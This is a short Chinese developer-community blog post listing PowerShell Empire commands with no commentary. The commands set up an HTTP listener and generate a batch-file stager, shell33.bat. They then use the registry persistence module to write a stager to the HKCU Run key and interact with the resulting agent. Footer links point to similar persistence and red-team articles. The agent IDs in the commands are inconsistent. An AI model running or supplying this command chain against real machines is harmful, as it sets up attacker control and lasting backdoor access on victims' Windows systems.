前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >empire-registry

empire-registry

原创
作者头像
浪子云
发布于 2022-06-24 03:53:38
发布于 2022-06-24 03:53:38
33000
代码可运行
举报
文章被收录于专栏:子云笔记子云笔记
运行总次数:0
代码可运行
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
empire-registry
powershell-empire server

powershell-empire client


uselistener http

set Name test
set Port 8899
execute

back


listeners

usestager windows/cmd_exec

set Listener test
set OutFile shell33.bat
execute


usemodule powershell/persistence/userland/registry

set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run

set Agent NRZAPF5cu6


interact NRZAPF56

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
powershell/persistence/userland/registry
usestager windows/cmd_exec usemodule powershell/persistence/userland/registry set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run set Agent NRZAPF56 interact NRZAPF56 2.jpg 3.jpg 4.jpg 5.jpg 6.jpg
浪子云
2022/05/23
2920
三大渗透框架权限维持
在渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。
Bypass
2019/10/03
1.2K0
内网渗透基石篇——权限维持分析
专注是做事成功的关键,是健康心灵的特质。当你与所关注的事物融为一体时,就不会让自己萦绕于焦虑之中。专注与放松,是同一枚硬币的两面而已。一个人对一件事只有专注投入才会带来乐趣。一旦你专注投入进去,它立刻就变得活生生起来。
FB客服
2021/08/24
1.6K0
FreeBuf__PowerShell Empire实战入门篇
前言 PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。 Empire详情介绍参考官方网站:http://powershellempire.
奶糖味的代言
2018/04/16
2.1K0
FreeBuf__PowerShell Empire实战入门篇
windows权限维持(二)
在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run,键名任意。普通权限即可运行
鸿鹄实验室
2021/04/15
1.7K0
windows权限维持(二)
Window权限维持(一):注册表运行键
在红队行动中在网络中获得最初的立足点是一项耗时的任务。因此,持久性是红队成功运作的关键,这将使团队能够专注于目标,而不会失去与指挥和控制服务器的通信。
Bypass
2019/11/07
1.2K0
Window权限维持(一):注册表运行键
一篇文章精通PowerShell Empire 2.3(下)
Empire主要用于后渗透。所以信息收集是比较常用的一个模块,我们可以使用searchmodule命令搜索需要使用的模块,这里通过键入“usemodule collection”然后按Tab键来查看完整列表,如下图所示。
HACK学习
2019/08/07
1K0
metasploit framework的一些使用姿势
Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
中龙技术
2022/09/29
1.2K0
Windows中常见后门持久化方法总结
当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法
HACK学习
2019/10/09
2.9K0
Windows中常见后门持久化方法总结
红队常用命令
如下编码网站: https://ares-x.com/tools/runtime-exec/ https://r0yanx.com/tools/java_exec_encode/ https://www.bugku.net/runtime-exec-payloads/
reyeye
2023/10/13
3.5K0
渗透测试与开发技巧
https://github.com/3gstudent/Pentest-and-Development-Tips
天钧
2021/01/05
4.7K0
Empire框架指南(一)
这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端
逍遥子大表哥
2022/11/14
8270
PowerShell渗透–Empire
Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpreter,是一个基于PowerShell的远控木马(www.powershellempire.com)
糖果
2019/11/20
2.4K0
从远程桌面服务到获取Empire Shell
本文将为大家详细介绍如何在只能访问远程桌面服务,且有 AppLocker 保护 PowerShell 处于语言约束模式下获取目标机器 Empire shell。PowerShell 处于语言约束模式,可以防止大多数PowerShell 技巧的使用。另外,还有 Windows Defender 也是我们必须要面对和解决的问题。
FB客服
2018/10/25
2K0
从远程桌面服务到获取Empire Shell
权限维持方法小结
WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截取 Windows XP 以及 Windows 2003 Server
中龙技术
2022/09/29
3.5K0
权限维持方法小结
获取主机已安装程序的多种方式
这篇文章我们主要讲的是获取主机已安装程序的多种方式,通过获取的软件及版本信息可用于权限提升、搜集密码等。因为有的方式获取不完整或者可能被安全防护软件拦截,所有我测试了多个方法,以备不时之需。
潇湘信安
2022/09/14
1.7K0
获取主机已安装程序的多种方式
渗透测试常规操作记录(下)
Linux 操作系统&内核版本&环境变量 >cat /etc/issue >cat /etc/*-release >cat /etc/lsb-release >cat /etc/redhat-release cat /proc/version >uname -a >uname -mrs >rpm -q kernel >dmesg | grep Linux >ls /boot | grep vmlinuz- >cat /etc/profile >cat /etc/bashrc >cat ~/.bash_pr
天钧
2020/10/23
5.8K0
渗透测试常规操作记录(下)
office模板
VBA可以插入到基本模板中,并用于在相应的 Office 应用程序启动时执行代码以获得持久性默认情况下,Word 会创建一个Normal.dotm 模板,可以对其进行修改以包含恶意宏Word Normal.dotm location:C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm%APPDATA%\Microsoft\Templates\ --> Normal.dotm分析Empire -- usestager/wind
浪子云
2022/11/24
9070
云服务器DIY Win10、Win11自定义镜像
DIY Win10自定义镜像,简单操作的话,用2012R2/2016/2019公共镜像(勿选2022)买台2c4g的S6(不要S5),然后挂个10G的数据盘,从微软官网下载win10 iso到数据盘。
Windows技术交流
2023/10/18
2K0
NT10系统安装wmic和netfx3并卸载AzureArcSetup
NT10系统安装wmic和netfx3并卸载AzureArcSetup,这段代码我在用原版ISO安装系统时在自动应答文件里有使用。
Windows技术交流
2024/12/26
1520
相关推荐
powershell/persistence/userland/registry
更多 >
LV.3
这个人很懒,什么都没有留下~
加入讨论
的问答专区 >
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档